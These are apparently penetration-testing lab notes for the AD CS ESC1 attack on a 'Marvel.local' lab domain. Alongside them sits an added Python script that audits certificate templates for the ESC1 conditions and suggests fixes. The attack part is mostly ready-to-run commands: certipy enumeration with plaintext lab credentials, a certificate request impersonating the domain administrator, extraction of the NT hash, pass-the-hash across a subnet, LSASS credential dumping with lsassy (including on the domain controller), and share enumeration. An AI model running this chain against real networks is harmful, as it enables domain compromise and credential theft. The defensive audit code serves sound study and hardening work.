Check for vulnerable templates and obtain the CA name plus the vulnerable template:
certipy find -username fcastle@Marvel.local -password Password1 -dc-ip 192.168.218.136 -stdout -debug -scheme ldap
Note whether the template allows Domain Users or Domain Computers to enroll.
If only Domain Computers can enroll, you need a machine account to abuse this:
- Combine with the ms-DS-MachineAccountQuota (default 10) attack to create a machine account
- Or dump the credentials of a machine you have local admin on (Mimikatz works for this as well)
Obtain the template CN and the certificate server name (the -target value):
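The "can Domain Users or Domain Computers enroll" check above is one of several conditions that together make a template ESC1-vulnerable. The following added example (not part of the original notes and not Certipy's own code) evaluates those conditions the way a defender auditing templates would, using the LDAP attribute names and flag bits from Microsoft's MS-CRTD specification, and names the single change that would close the finding. The template records are constructed inline for illustration; a real audit would read them from the Certificate Templates container in the Configuration naming context.

```python
"""Added example: evaluate certificate templates for the ESC1 preconditions.

Not from the original notes and not Certipy's code. Applies the same checks
`certipy find` reports: published on a CA, enrollee supplies the subject,
no manager approval, no authorized signatures, an EKU that permits client
authentication, and enrollment rights for low-privileged principals.
"""
from dataclasses import dataclass, field
from typing import Optional

# Flag bits from msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag (MS-CRTD).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # requester supplies subject/SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # CA manager approval required

# EKU OIDs that make an issued certificate usable for domain authentication.
# An empty pKIExtendedKeyUsage (no EKU restriction) also allows authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Principals whose Enroll right makes a template reachable from any user or
# machine account (the Domain Users / Domain Computers check from the notes).
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


@dataclass
class Template:
    name: str
    published: bool                 # listed in a CA's certificateTemplates attribute
    name_flag: int                  # msPKI-Certificate-Name-Flag
    enrollment_flag: int            # msPKI-Enrollment-Flag
    ra_signatures: int              # msPKI-RA-Signature
    ekus: list = field(default_factory=list)               # pKIExtendedKeyUsage OIDs
    enroll_principals: set = field(default_factory=set)    # principals with Enroll in the ACL


def allows_client_auth(ekus: list) -> bool:
    """No EKU at all, or any authentication EKU, lets the cert be used for logon."""
    return not ekus or bool(AUTH_EKUS.intersection(ekus))


def esc1_conditions(t: Template) -> dict:
    """Each ESC1 precondition evaluated separately, so a report can show which hold."""
    return {
        "published on a CA": t.published,
        "enrollee supplies subject": bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no manager approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures": t.ra_signatures == 0,
        "authentication EKU": allows_client_auth(t.ekus),
        "low-privileged enrollment": bool(LOW_PRIV_PRINCIPALS & t.enroll_principals),
    }


def esc1_finding(t: Template) -> Optional[dict]:
    """Return a finding (template, enrollers, fix) or None if any condition fails."""
    if not all(esc1_conditions(t).values()):
        return None
    enrollers = sorted(LOW_PRIV_PRINCIPALS & t.enroll_principals)
    return {
        "template": t.name,
        "enrollers": enrollers,
        # Breaking any single precondition closes ESC1; these are the usual fixes.
        "fix": (
            f"remove Enroll for {', '.join(enrollers)}, or clear "
            "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, or require manager approval"
        ),
    }


def scan(templates: list) -> list:
    """All ESC1 findings across the given templates."""
    return [f for t in templates if (f := esc1_finding(t)) is not None]


# Constructed sample templates (illustrative values, not read from a domain).
SAMPLE_TEMPLATES = [
    Template("vulnCert", True, 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.2"], {"Domain Computers", "Domain Admins"}),
    Template("WebServerLike", True, 0x1, 0x0, 0, ["1.3.6.1.5.5.7.3.1"], {"Domain Users"}),     # server auth only
    Template("ApprovedSubject", True, 0x1, 0x2, 0, [], {"Domain Users"}),                      # manager approval set
    Template("UserLike", True, 0x82000000, 0x0, 0, ["1.3.6.1.5.5.7.3.2"], {"Domain Users"}),  # subject built from AD
    Template("Unpublished", False, 0x1, 0x0, 0, [], {"Authenticated Users"}),                  # not on any CA
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_TEMPLATES):
        print(f"{finding['template']}: enrollable by {finding['enrollers']}; fix: {finding['fix']}")
```

Only `vulnCert` trips every condition in the sample set; each of the other templates is stopped by exactly one failed check, which is why the per-condition breakdown from `esc1_conditions` is more useful to a template owner than a single vulnerable/not-vulnerable verdict.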
nxc ldap 192.168.218.136 -u 'fcastle' -p 'Password1' -M adcs
Run the ESC1 attack (request a certificate with the target UPN as the subject alternative name):
certipy req -u "MachineAccName" -p "MachinePassword" -dc-ip 192.168.218.136 -target "CertServer.marvel.local" -ca "MARVELCA" -template "vulnCert" -upn "administrator@marvel.local" -dns-tcp
If there are issues, add -debug to the end of the command as well.
Retrieve the NT hash from the PFX:
certipy auth -pfx administrator.pfx -dc-ip 192.168.218.136 -username administrator -domain Marvel.local
Use the NTLM hash for further access, for example:
Pass-the-Hash for machine access:
nxc smb 192.168.218.0/24 -u "administrator" -H hashGoesHere
Lsassy (dump LSASS credentials via the lsassy module):
nxc smb 192.168.218.0/24 -u "administrator" -H hashGoesHere -M lsassy
This can also be run against the DC only:
nxc smb 192.168.218.136 -u "administrator" -H hashGoesHere -M lsassy
Enumerate shares:
nxc smb 192.168.218.0/24 -u "administrator" -H hashGoesHere --shares